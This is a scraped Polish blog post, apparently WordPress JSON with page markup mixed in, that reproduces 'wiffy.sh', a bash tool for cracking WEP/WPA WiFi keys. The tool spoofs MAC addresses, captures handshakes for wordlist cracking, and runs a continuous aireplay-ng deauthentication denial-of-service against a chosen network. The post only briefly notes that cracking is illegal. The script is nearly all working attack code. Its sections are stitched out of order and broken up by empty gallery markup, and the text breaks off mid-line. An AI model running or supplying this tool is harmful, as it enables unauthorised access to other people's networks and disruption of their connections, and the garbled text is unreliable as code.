\/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/akwarium\/akwarium0007_0.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m 